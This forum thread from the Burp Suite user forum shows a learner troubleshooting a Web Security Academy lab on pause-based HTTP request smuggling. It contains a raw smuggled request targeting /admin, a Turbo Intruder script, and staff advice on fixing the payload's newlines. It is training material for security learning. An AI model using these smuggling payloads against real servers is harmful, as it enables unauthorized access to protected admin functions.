Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Server-side pause-based request smuggling ISSUE

Hamza | Last updated: Jul 03, 2024 10:42AM UTC

I run this POST /resources HTTP/1.1 Host: 0a2200f2043d4f71805fd09600be0071.web-security-academy.net Cookie: session=mAbLimPqmVB5vNGU7notqlDu7ZCsW8O4 Content-Type: application/x-www-form-urlencoded Content-Length: CORRECT connection: keep-alive GET /admin HTTP/1.1 Host: localhost def queueRequests(target, wordlists): engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=1, requestsPerConnection=500, pipeline=False ) engine.queue(target.req, pauseMarker=['\r\n\r\n'], pauseTime=61000) engine.queue(target.req) def handleResponse(req, interesting): table.add(req) After Launching attack in turbo i got: HTTP/1.1 400 Bad Request Content-Type: application/json; charset=utf-8 X-Content-Type-Options: nosniff Server: Apache/2.4.52 Keep-Alive: timeout=120 Content-Length: 50 {"error":"Duplicate header names are not allowed"}

Ben, PortSwigger Agent | Last updated: Jul 03, 2024 01:22PM UTC

Hi Hamza, Are you able to provide us with a screenshot of the full request that you have configured in Turbo Intruder alongside the Turbo Intruder script that you are running so that we can see this in its entirety?

Hamza | Last updated: Jul 04, 2024 04:59AM UTC

sure, how i can provide screenshot, or where to upload the screenshot. because there is no option of uploading screenshot

Michelle, PortSwigger Agent | Last updated: Jul 04, 2024 08:02AM UTC

Can you email it to support@portswigger.net and reference this forum post, please?

Hamza | Last updated: Jul 04, 2024 10:58AM UTC

I am running: POST /resources HTTP/1.1 Host: 0a9500d103b3bce3804ce9c5006a0004.web-security-academy.net Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 85 GET /admin/ HTTP/1.1 Host: 0a9500d103b3bce3804ce9c5006a0004.web-security-academy.net I got: HTTP/1.1 400 Bad Request Content-Type: application/json; charset=utf-8 X-Content-Type-Options: nosniff Server: Apache/2.4.52 Keep-Alive: timeout=120 Content-Length: 50 {"error":"Duplicate header names are not allowed"}

Michelle, PortSwigger Agent | Last updated: Jul 04, 2024 12:55PM UTC

Hi Thanks for sending us an email. We'll take a look through and check the details of the lab and be in touch soon.

Michelle, PortSwigger Agent | Last updated: Jul 05, 2024 08:21AM UTC

Thanks for sending the screenshot over. When you configure your request in Turbo Intruder you will need to make sure there are 2 new line characters after the end of the second host header. If you add these, your attack should be successful. I hope this helps.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.